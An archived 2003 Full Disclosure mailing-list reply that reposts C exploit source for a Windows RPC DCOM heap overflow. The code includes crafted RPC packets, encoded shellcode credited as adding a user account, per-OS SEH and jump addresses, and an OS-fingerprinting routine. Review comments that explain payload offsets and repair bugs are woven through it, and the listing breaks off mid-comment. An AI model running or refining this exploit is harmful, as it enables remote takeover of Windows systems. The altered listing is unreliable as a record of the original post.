Full Disclosure mailing list archives

Re: Re: Bad news on RPC DCOM vulnerability


From: Irwan Hadi <irwanhadi () phxby com>
Date: Fri, 10 Oct 2003 15:06:31 -0600

On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:

For those of us who cannot read the site, what more information can be
provided?

I believe if you use babelfish.altavista.com, you'll come to:
http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=0&TPN=3

The code itself is:

#include <stdio.h> 
#include <winsock2.h> 
#include <windows.h> 
#include <process.h> 
#include <string.h> 
#include <winbase.h> 

/* Results log for scan mode: attack() writes "<os> <ip>" here when called with
 * atack == 0, and main() fflush()es / fclose()s it.
 * NOTE(review): nothing in this listing ever fopen()s fp1, so as posted it is
 * still NULL when fprintf()/fclose() are reached - presumably lost in the paste. */
FILE *fp1; 
/* First PDU attack() sends on the exploit connection, before waiting for a
 * reply and then sending buf2. Its leading bytes 05 00 0B 03 match the shape
 * of a DCE/RPC v5 header with packet type 0x0B (bind) and first/last fragment
 * flags - TODO confirm against the DCE/RPC spec; the listing never decodes it.
 * Not modified anywhere in the listing. */
unsigned char bindstr[]={ 
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 

/* Head of the exploit request (864 bytes). attack() copies it to the start of
 * buf2, appends request2, rawData (1036 bytes), request3 and request4, and
 * then adds (sizeof(rawData) - 0xc) = 1024 to the little-endian DWORDs at
 * offsets 0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0 and 0x18c of this block.
 * The DWORD at offset 8 starts at 0x3e8 (1000) and the finished buf2 is
 * 864+16+1036+60+48 = 2024 = 0x3e8+0x400 bytes, consistent with it being a
 * fragment-length field - TODO confirm; the other patched fields are not
 * documented anywhere in the listing. Leading bytes 05 00 00 03 look like a
 * DCE/RPC v5 request header. The ASCII "MARB" (4D 41 52 42) and "MEOW"
 * (4D 45 4F 57) tags are visible in the bytes; their meaning is not stated
 * here. Not modified in place (attack() patches its copy in buf2). */
unsigned char request1[]={ 
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00}; 

/* 16 bytes placed directly before rawData in buf2. attack() adds
 * sizeof(rawData)/2 = 518 to the DWORDs at offsets 0 and 8 (both 0x20 here),
 * which reads like a pair of UTF-16 character counts for the string that
 * follows - the trailing 5C 00 5C 00 is L"\\\\" and rawData continues with
 * L"localhost\C$\...". TODO confirm.
 * NOTE(review): the archived attack() patches this global in place, so a
 * second attack() call in the same process would add 518 again. */
unsigned char request2[]={ 
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x5C,0x00,0x5C,0x00}; 

/* Appended after rawData in buf2 (60 bytes, not patched): the UTF-16 string
 * "FC$F123456" followed by a run of '1' characters and ".doc", NUL-terminated. */
unsigned char request3[]={ 
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 


/* Tail of the request (48 bytes). attack() appends it after request3 and does
 * not patch anything in it. Begins with the same 01 10 08 00 CC CC CC CC
 * pattern that recurs throughout request1; its meaning is not documented in
 * the listing. */
unsigned char request4[]={ 
0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
}; 
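/*
 * XOR-encode (or decode - the operation is its own inverse) a byte range in
 * place.
 *
 * buf:    buffer to modify (NULL is tolerated: no-op).
 * offset: index of the first byte to transform (negative: no-op).
 * length: number of bytes to transform (<= 0: no-op).
 * mask:   byte XORed into every byte of [offset, offset+length).
 *
 * attack() calls this as XOR(rawData, 0x71, sz, 0x99) to wrap the bytes read
 * from "bshell2"; the same 0x99 constant appears in the stub bytes at the head
 * of that region of rawData1. The caller must guarantee offset+length stays
 * inside the buffer - this function has no way to check it.
 *
 * NOTE(review): the archived copy read `buf=buf^mask;` - the `[i]` subscripts
 * were stripped by the mailing-list renderer (it treats "[i]" as markup) and
 * are restored here. The third parameter was spelt `lenght`; all calls are
 * positional, so the rename is compatible.
 */
void XOR(unsigned char *buf, int offset, int length, unsigned char mask)
{
    if (buf == NULL || offset < 0 || length <= 0)
        return;
    for (int i = offset; i < offset + length; i++)
        buf[i] ^= mask;
}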
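/*
 * ROR-13/add string hash ("get string checksum").
 *
 * For every byte of buf: rotate the running 32-bit value right by 13 bits,
 * then add the byte. The only use in this listing is commented out (printing
 * the hash of argv[1] in the old usage banner), so the value is for the
 * operator's reference rather than the exploit path.
 *
 * buf: NUL-terminated string; must not be NULL.
 * Returns the 32-bit hash; 0 for the empty string.
 *
 * Bytes are added as `char`, exactly as the original did, so on a compiler
 * with signed char a byte >= 0x80 sign-extends before the add - kept so the
 * values stay comparable with the original. DWORD is assumed 32-bit (Win32);
 * the original assumed the same via its 0x80000000 carry bit.
 *
 * NOTE(review): the archived copy read `cs+=buf;` - the `[i]` subscript was
 * stripped by the mailing-list renderer and is restored here. The 13
 * single-bit carry-propagating shifts are replaced by one rotate.
 */
DWORD GETSTRCS(char *buf)
{
    DWORD cs = 0;
    size_t n = strlen(buf);   /* original re-evaluated strlen() on every iteration */
    for (size_t i = 0; i < n; i++) {
        cs = (cs >> 13) | (cs << 19);   /* ror 13 */
        cs += (DWORD)buf[i];
    }
    return cs;
}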

/* Per-target constants that attack() writes into the payload copy:
 *   seh  -> rawData+0x22e   (the comment on rawData1 calls this slot the
 *                            "TOP SEH" and says it must be changed per OS/SP)
 *   jmp  -> rawData+0x22a
 *   heap -> rawData+0x71+0x1e
 * Index: attack() uses target_os[!version()], so entry 0 (WinXP) is used when
 * version() returns 1 (XP) or -1 (unknown), entry 1 (Win2K) when it returns 0.
 * The addresses are build-specific (the rawData1 comments mention Chinese
 * W2K SP4 / MS03-026 builds) and nothing in the listing validates them.
 * `v` is a spare instance of the same anonymous struct; it is only referenced
 * by commented-out code, as sizeof(v) for the element count. */
struct { 
     DWORD seh; 
     DWORD jmp; 
     DWORD heap; 
     char target[200]; 
} target_os[]= 
{ 
     { 
          0x005Bfd2c, 
          0x00081eeb, 
          0x00180000, 
          "WinXP" 
     }, 
     { 
          0x0095fd3c, 
          0x00081eeb, 
          0x00170000, 
          "Win2K" 
     } 
},v; 
/* Template for the 1036-byte rawData block that attack() builds and inserts
 * between request2 and request3. Counting the fragments below gives 1035
 * bytes plus the string's NUL, i.e. exactly the 1036 that attack() memcpy()s
 * - recount before editing any fragment.
 *
 * Layout as attack() uses it (offsets are what attack() writes; what the
 * fields mean is not documented anywhere in the listing):
 *   0x00       UTF-16 "localhost\C$\" (the first two fragments)
 *   0x62       16-bit field set to the size of the bytes read from "bshell2"
 *   0x71       start of the region overwritten with the contents of "bshell2"
 *              (up to the end of the block) and then XORed with 0x99; the
 *              template bytes here are a short stub followed by the "add user"
 *              shellcode credited below, both containing the 0x99 constant
 *   0x71+0x1e  DWORD set to target_os[vers].heap
 *   0x22a      DWORD set to target_os[vers].jmp  (the "MS03-26" fragment)
 *   0x22e      DWORD set to target_os[vers].seh  (the "TOP SEH" fragment)
 * The remainder, per the original author's comment below, is filler to push
 * the UNC string past 0x400 bytes. */
unsigned char rawData1[]= 
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" 
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" 

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" 
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" 
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" 
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"     

// Shellcode credited by the original author to "SAM" (thanks!).
// Per the original comment it adds user "SST" with password "557" - the
// listing provides no way to verify that; it is normally replaced anyway by
// the contents of "bshell2" (see attack()).
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" 
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" 
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" 
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" 
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" 
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" 
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" 
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" 
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" 
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" 
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" 
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" 
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" 
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" 
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" 
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" 
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" 
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" 
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" 
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" 
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" 

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" 
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" 
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" 
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" 
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" 
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" 
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" 
    "\x90\x90\x90\x90\x90\x90\x90\x90" 
    "\x77\xe0\x43\x00\x00\x10\x5c\x00" 
    "\xeb\x1e\x01\x00"   // offset 0x22a: overwritten with target_os[vers].jmp (original note: "FOR CN SP3/SP4 +- MS03-26")
    "\x4C\x14\xec\x77"   // offset 0x22e: overwritten with target_os[vers].seh (original note: "TOP SEH for CN W2K+SP4, must modify to the SEH of your target's OS")

// Filler so that sizeof(UNC) > 0x400 (0x80*8). For the reason the original
// author refers to their article "Utilization of released heap structure and
// exploit of universal heap overflow in Windows".
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" 
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" 
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" 
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" 
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" 
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" 
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" 
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" 
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" 
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" 
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" 
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" 
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" 
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" 
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" 
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" 
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" 
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" 
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" 
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" 
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" 
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" 
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" 
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" 
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" 
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" 

"\x04\x04\x00\x70\x00\x04\x40" 
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" 

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; 


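/*
 * Fingerprint the target OS over an already-connected socket.
 *
 * Sends the canned PDU peer0_0, waits up to 6 s for any reply, then sends
 * peer0_1 and classifies purely on the LENGTH of the second reply:
 *   returns  1 - second reply is exactly 32 bytes   (taken to be Windows XP)
 *   returns  0 - any other length                   (taken to be Windows 2000;
 *                the original notes NT4 is not handled)
 *   returns -1 - send failed or no reply within 6 s  (unknown)
 * `ip` is unused and kept for the existing call site. The reply bytes are
 * received into `buf` but never inspected.
 *
 * The socket is closed on EVERY return path. The archived listing closed it
 * on three of four paths (leaking it on the second timeout) and attack() then
 * closed it again; with many scanner threads alive a double closesocket() can
 * hit a handle number that already belongs to another thread's socket, so
 * attack() must not close it after calling this function.
 *
 * peer0_0 begins 05 00 0b 03 and peer0_1 05 00 00 03, which match the shape
 * of DCE/RPC v5 bind and request headers - TODO confirm against the spec;
 * nothing here decodes them. The original author's comment "un poco de
 * ettercap..." ("a bit of ettercap...") suggests the bytes were captured from
 * a live session. The original also carried a commented-out comparison of the
 * first reply against a `win2kvuln` byte table (its `[i]` subscripts were
 * lost in the archive); that abandoned code is dropped here and the table
 * kept below for reference only.
 */
int version(char ip[16], int sock)
{
    /* a bit of ettercap... (original comment) */
    static const unsigned char peer0_0[] = {
    0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 
    0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 
    0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 
    0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 
    0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 
    0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
    0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
    0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 
    0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 
    0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
    0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 
    0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 
    0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
    0x02, 0x00, 0x00, 0x00 };

    /* Second PDU; contains the UTF-16 path "\\A" "AA\C$\A.txt" in its body. */
    static const unsigned char peer0_1[] = {
    0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 
    0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 
    0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
    0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 
    0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 
    0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 
    0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 
    0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 
    0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
    0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 
    0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 
    0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 
    0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
    0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 
    0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 
    0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
    0x07, 0x00 };

    /* Kept from the original for reference; never used by the live code.
    unsigned char win2kvuln[] = {
    0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
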